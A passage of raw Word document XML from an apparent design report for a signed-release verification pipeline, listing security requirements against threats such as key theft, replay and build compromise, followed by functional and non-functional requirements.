                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V3, V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SHA-256 in signed manifest + Ed25519 artifact signature</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SR2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accept only artifacts authorised by the vendor's release process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V2, V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ed25519 manifest signature, keys from root-signed trust policy</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SR3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A storage or CI credential alone must not be enough to publish a trusted release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V1, V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signing service with RBAC + TOTP MFA; HSM/KMS concept</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SR4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Private signing keys never distributed and protected at rest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Encrypted PKCS#8 (0600), signing-service-only access</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SR5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compromised keys and vulnerable versions can be invalidated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Key theft, replay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Key rotation / revocation, revoked-version list, minimum version</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SR6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Old or revoked releases cannot be replayed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Replay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Anti-rollback state, trust-policy version and expiry</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SR7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Provenance: artifact must come from an approved builder and repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Build compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signed provenance bound to artifact hash</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SR8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secure transport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MITM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TLS 1.3 only, CA-validated certificate</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SR9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Verification is automatic and fail-closed in CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Security gate: exit code 1 blocks the pipeline</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SR10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tamper-evident accountability for every signing and verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V6, repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SHA-256 hash-chained SQLite audit log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SR11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Malicious exfiltration code is not released or deployed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Static security tests at build time and in the customer gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.2 Functional Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Build the artifact, run security tests, compute its SHA-256 and generate provenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sign the artifact and a manifest (artifact, version, sha256, algorithms, signer, key_id, timestamp, provenance).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manage keys: generate, rotate, revoke, publish a root-signed trust policy, export the root public key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Serve artifacts over HTTPS with TLS 1.3 and download them in the customer pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verify every artifact and return PASS or a specific failure status (HASH_MISMATCH, INVALID_SIGNATURE, UNAUTHORIZED_KEY, REVOKED, REPLAY_BLOCKED, INVALID_MANIFEST, INVALID_PROVENANCE, INVALID_TRUST_POLICY, POLICY_VIOLATION).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy or block, raise security events, and record everything in the audit log and dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulate the attacks safely and provide automated tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.3 Non-functional Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: verification must add negligible time to a CI run (target under 50 ms for typical artifacts).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reliability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: zero false acceptances of tampered artifacts in controlled tests, and a fail-closed default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Portability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: pure Python 3.10+ with a single cryptographic dependency; runs on Linux, macOS and Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
